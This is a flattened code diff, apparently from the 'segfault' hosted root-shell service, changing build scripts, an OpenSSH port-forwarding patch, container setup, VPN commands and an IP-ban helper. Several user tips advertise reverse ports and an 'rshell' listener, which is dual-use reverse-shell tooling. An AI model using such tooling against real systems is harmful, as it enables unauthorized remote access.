docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
@echo SUCCESS @echo SUCCESS
diff: diff:
cd dev && \ cd dev && \
diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
clean: clean:
rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
docker image rm alpine-gcc docker image rm sf-alpine-gcc

@ -424,7 +424,7 @@ print_goodbye()
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick # Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it. # Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1) n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
[[ -z "$n" ]] && n=0 [[ -z "$n" ]] && n=0
[[ ${#n} -gt 5 ]] && n=0 [[ ${#n} -gt 5 ]] && n=0
[[ ! $n -eq $n ]] && n=0 [[ ! $n -eq $n ]] && n=0
@ -435,7 +435,7 @@ print_goodbye()
str="process is" str="process is"
[[ "$n" -gt 1 ]] && str="processes are" [[ "$n" -gt 1 ]] && str="processes are"
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}" echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
echo -e "\ echo -e "\
-------> The encrypted filesystem in /sec will remain accessible until -------> The encrypted filesystem in /sec will remain accessible until
-------> the last shell exits or all background processes terminate. -------> the last shell exits or all background processes terminate.
@ -443,16 +443,6 @@ print_goodbye()
-------> This will also make /sec unavailabe until your next log in." -------> This will also make /sec unavailabe until your next log in."
fi fi
echo -en "\r" echo -en "\r"
[[ -z $SF_IS_PAYING ]] && {
echo -e "\
${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@
@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@
@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
}
sysmsg "/config/host/etc/logoutmsg-all.sh" sysmsg "/config/host/etc/logoutmsg-all.sh"
echo -e "\ echo -e "\
@ -536,7 +526,7 @@ spawn_shell_exit()
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip" tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip" [[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
# Request a reverse Port Forward # Request a reverse Port Forward
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port [[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
# Warn user if this is the last server by IP (after semaphore has been released) # Warn user if this is the last server by IP (after semaphore has been released)
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
# Setup container (within container's namespace) # Setup container (within container's namespace)
unset WGNAME_UP unset WGNAME_UP
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")" [[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..." exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY" touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip" tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"

@ -11,11 +11,17 @@
DSTDIR="/src/fs-root/usr/sbin" DSTDIR="/src/fs-root/usr/sbin"
DSTBIN="${DSTDIR}/sshd" DSTBIN="${DSTDIR}/sshd"
set -e set -e
SRCDIR="/tmp/openssh-9.2p1" SRCDIR="/src/dev/openssh-${VER:?}-sf"
[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
cd /src/dev
[[ ! -d "$SRCDIR" ]] && { [[ ! -d "$SRCDIR" ]] && {
# Cloudflare to often returns 503 - "BLOCKED" # Cloudflare to often returns 503 - "BLOCKED"
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - # wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
tar xfz "openssh-${VER}.tar.gz"
mv "openssh-${VER}" "openssh-${VER}-orig"
tar xfz "openssh-${VER}.tar.gz"
mv "openssh-${VER}" "${SRCDIR}"
cd "$SRCDIR" cd "$SRCDIR"
@ -39,5 +45,5 @@ strip sshd
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}" [[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
cp sshd "${DSTBIN}" cp sshd "${DSTBIN}"
chmod 755 "${DSTBIN}" chmod 755 "${DSTBIN}"
rm -rf "${SRCDIR:?}" # rm -rf "${SRCDIR:?}"

@ -1,7 +1,7 @@
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
--- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54 --- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50
+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05 +++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15
@@ -3639,7 +3639,7 @@ @@ -3683,7 +3683,7 @@
ssh->chanctxt->IPv4or6 = af; ssh->chanctxt->IPv4or6 = af;
} }
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
/* /*
* Determine whether or not a port forward listens to loopback, the * Determine whether or not a port forward listens to loopback, the
* specified address or wildcard. On the client, a specified bind * specified address or wildcard. On the client, a specified bind
@@ -3677,6 +3677,7 @@ @@ -3721,6 +3721,7 @@
* address and it was overridden. * address and it was overridden.
*/ */
if (*listen_addr != '\0' && if (*listen_addr != '\0' &&
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
strcmp(listen_addr, "0.0.0.0") != 0 && strcmp(listen_addr, "0.0.0.0") != 0 &&
strcmp(listen_addr, "*") != 0) { strcmp(listen_addr, "*") != 0) {
ssh_packet_send_debug(ssh, ssh_packet_send_debug(ssh,
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
--- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54 --- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50
+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17 +++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15
@@ -102,6 +102,12 @@ @@ -101,6 +101,12 @@
/* requested tunnel forwarding interface(s), shared with session.c */ /* requested tunnel forwarding interface(s), shared with session.c */
char *tun_fwd_ifnames = NULL; char *tun_fwd_ifnames = NULL;
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
/* returns 1 if bind to specified port by specified user is permitted */ /* returns 1 if bind to specified port by specified user is permitted */
static int static int
bind_permitted(int port, uid_t uid) bind_permitted(int port, uid_t uid)
@@ -391,8 +397,10 @@ @@ -388,8 +394,10 @@
/* Clean up sessions, utmp, etc. */ /* Clean up sessions, utmp, etc. */
cleanup_exit(255); cleanup_exit(255);
} }
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
if (conn_in_ready && if (conn_in_ready &&
process_input(ssh, connection_in) < 0) process_input(ssh, connection_in) < 0)
break; break;
@@ -637,12 +645,14 @@ @@ -634,12 +642,14 @@
if (strcmp(ctype, "session") == 0) { if (strcmp(ctype, "session") == 0) {
c = server_request_session(ssh); c = server_request_session(ssh);
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
} }
if (c != NULL) { if (c != NULL) {
debug_f("confirm %s", ctype); debug_f("confirm %s", ctype);
@@ -802,8 +812,20 @@ @@ -799,8 +809,20 @@
ssh_packet_send_debug(ssh, "Server has disabled port forwarding."); ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
} else { } else {
/* Start listening on the port */ /* Start listening on the port */
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
} }
if ((resp = sshbuf_new()) == NULL) if ((resp = sshbuf_new()) == NULL)
fatal_f("sshbuf_new"); fatal_f("sshbuf_new");
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
--- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54 --- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50
+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05 +++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15
@@ -536,8 +536,71 @@ @@ -531,8 +531,71 @@
return 0; return 0;
} }
} }
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
privsep_postauth(struct ssh *ssh, Authctxt *authctxt) privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
{ {
#ifdef DISABLE_FD_PASSING #ifdef DISABLE_FD_PASSING
@@ -576,8 +639,34 @@ @@ -571,8 +634,34 @@
reseed_prngs(); reseed_prngs();

@ -47,6 +47,23 @@ Sanitize()
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..." [[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
} }
InitColors() {
# COLOR is set (to 'always')
Y=$CDY
C=$CDC
R=$CDR
RR=$CR
G=$CDG
B=$CB
M=$CDM
YY=$CY
W=$CW
N=$CN
F=$CF
ICON_ERROR="💥 "
ICON_WARN="💥 "
}
GetFormVars() GetFormVars()
{ {
local IFS local IFS
@ -71,7 +88,6 @@ GetFormVars()
[[ ${key} == "config" ]] && { [[ ${key} == "config" ]] && {
R_CONFIG="${val//[^[:alnum:]-_+\/.]}" R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG [[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
} }
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}" [[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}" [[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
@ -128,6 +144,9 @@ GetFormVars()
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}" [[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
} }
done done
[[ -n $COLOR ]] && InitColors
[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
} }
# Load PID of WireGuard container # Load PID of WireGuard container
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
# The PortD add's a /sf/run/self/reverse_forward. # The PortD add's a /sf/run/self/reverse_forward.
echo -en "\ echo -en "\
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} ${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
${M}🤭 Tip${N}: Type ${C}rshell${N} ${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
${G}👾 New reverse Port is ${Y}${ipport}${CN}" ${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
# portd.sh automaticaly adds this to /config/self/reverse_* # portd.sh automaticaly adds this to /config/self/reverse_*
exit exit
@ -807,22 +827,7 @@ cmd_wg_show()
0<&- # Close STDIN 0<&- # Close STDIN
Sanitize Sanitize
GetFormVars GetFormVars
[[ -n $COLOR ]] && {
# COLOR is set (to 'always')
Y=$CDY
C=$CDC
R=$CDR
RR=$CR
G=$CDG
B=$CB
M=$CDM
YY=$CY
W=$CW
N=$CN
F=$CF
ICON_ERROR="💥 "
ICON_WARN="💥 "
}
[[ "${FCGI_CMD}" == "dmesg" ]] && { [[ "${FCGI_CMD}" == "dmesg" ]] && {
@ -836,13 +841,13 @@ GetFormVars
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*) # If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
[[ -n $SF_OVPN_HACK ]] && { [[ -n $SF_OVPN_HACK ]] && {
wg_net_init wg_net_init
[[ ${ARGS[1]} == 'vpn' ]] && { [[ ${ARGS[1]} == 'ovpn' ]] && {
source "/sf/bin/funcs_vpn.sh" source "/sf/bin/funcs_ovpn.sh"
[[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up [[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up
[[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show [[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show
[[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del [[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del
[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del [[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
cmd_vpn_help cmd_ovpn_help
exit exit
} }
} }
@ -869,14 +874,14 @@ wg_net_init
exit exit
} }
[[ "${FCGI_CMD}" == "vpn" ]] && { [[ "${FCGI_CMD}" == "ovpn" ]] && {
source "/sf/bin/funcs_vpn.sh" source "/sf/bin/funcs_ovpn.sh"
[[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up [[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up
[[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show [[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show
[[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del [[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del
[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del [[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show # [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
cmd_vpn_help cmd_ovpn_help
exit exit
} }

@ -19,7 +19,9 @@ USER_UL_RATE="$5"
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt" LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
# Create 'empty' for ZSH's prompt to show WG EXIT # Create 'empty' for ZSH's prompt to show WG EXIT
[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}" # [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still.
:>"${LID_PROMPT_FN}"
set -e set -e
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}") LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")

@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
SF_MULLVAD_ROUTE=10.124.0.0/22 SF_MULLVAD_ROUTE=10.124.0.0/22
SF_NOVPN_IP=172.20.0.240 SF_NOVPN_IP=172.20.0.240
SF_NGINX_IP=172.20.1.80 SF_NGINX_IP=172.20.1.80
SF_RPC_IP=10.11.0.2 SF_RPC_IP=100.126.224.2
SF_GSNC_IP=172.22.0.21 SF_GSNC_IP=172.22.0.21
SF_SSHD_IP=172.22.0.22 SF_SSHD_IP=172.22.0.22
SF_DOH_IP=172.23.0.2 SF_DOH_IP=172.23.0.2
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
SF_NET_VPN=172.20.0.0/24 SF_NET_VPN=172.20.0.0/24
SF_NET_VPN_DNS_IP=172.20.0.53 SF_NET_VPN_DNS_IP=172.20.0.53
SF_NET_LG=10.11.0.0/24 SF_NET_LG=100.126.224.0/22
SF_NET_LG_ROUTER_IP=10.11.0.1 SF_NET_LG_ROUTER_IP=100.126.224.1
SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254 SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
SF_NET_VPN_ROUTER_IP=172.20.0.2 SF_NET_VPN_ROUTER_IP=172.20.0.2

@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
CG="\e[1;32m" # green CG="\e[1;32m" # green
CR="\e[1;31m" # red CR="\e[1;31m" # red
CC="\e[1;36m" # cyan CC="\e[1;36m" # cyan
# CM="\e[1;35m" # magenta CM="\e[1;35m" # magenta
CW="\e[1;37m" # white CW="\e[1;37m" # white
CB="\e[1;34m" # blue CB="\e[1;34m" # blue
CF="\e[2m" # faint CF="\e[2m" # faint

@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
_sf_basedir="/sf" _sf_basedir="/sf"
_sf_dbdir="${_sf_basedir}/config/db" _sf_dbdir="${_sf_basedir}/config/db"
unset _sf_isinit unset _sf_isinit
_sf_region="$(hostname)"
_sf_deinit() _sf_deinit()
{ {
@ -507,27 +508,29 @@ lgrm()
lgban() lgban()
{ {
local fn local fn
local hn
local ip local ip
local msg local msg
local lid local lglid="${1}"
_sf_init _sf_init
lid="${1}"
shift 1 shift 1
fn="${_self_for_guest_dir}/${lid}/ip" fn="${_self_for_guest_dir}/${lglid}/ip"
[[ -f "$fn" ]] && { [[ -f "$fn" ]] && {
ip=$(<"$fn") ip=$(<"$fn")
fn="${_self_for_guest_dir}/${lglid}/hostname"
[[ -f "${fn}" ]] && hn=$(<"${fn}")
fn="${_sf_dbdir}/banned/ip-${ip:0:18}" fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
[[ ! -e "$fn" ]] && { [[ ! -e "$fn" ]] && {
[[ $# -gt 0 ]] && msg="$*\n" [[ $# -gt 0 ]] && msg="$*\n"
echo -en "$msg" >"${fn}" echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
} }
echo "Banned: $ip" echo "Banned: $ip"
} }
lgstop "${lid}" "$@" lgstop "${lglid}" "$@"
#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server. #_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
_sf_deinit _sf_deinit
} }

@ -6,7 +6,7 @@
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80)) [[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
cmd_vpn_help() { cmd_ovpn_help() {
echo -en "\ echo -en "\
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N} Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N} Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
@ -241,7 +241,7 @@ vpn_stop() {
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
} }
cmd_vpn_show() { cmd_ovpn_show() {
load_lg load_lg
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && { [[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
echo -e "${C}" echo -e "${C}"
@ -252,12 +252,12 @@ cmd_vpn_show() {
exit exit
} }
cmd_vpn_up() { cmd_ovpn_up() {
local str local str
load_lg load_lg
local link_mtu local link_mtu
[[ -z "$R_CONFIG" ]] && cmd_vpn_help [[ -z "$R_CONFIG" ]] && cmd_ovpn_help
WG_DEV="vpnEXIT" WG_DEV="vpnEXIT"
# echo "PID=$PID" # echo "PID=$PID"
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
exit exit
} }
cmd_vpn_del() { cmd_ovpn_del() {
load_lg load_lg
vpn_stop vpn_stop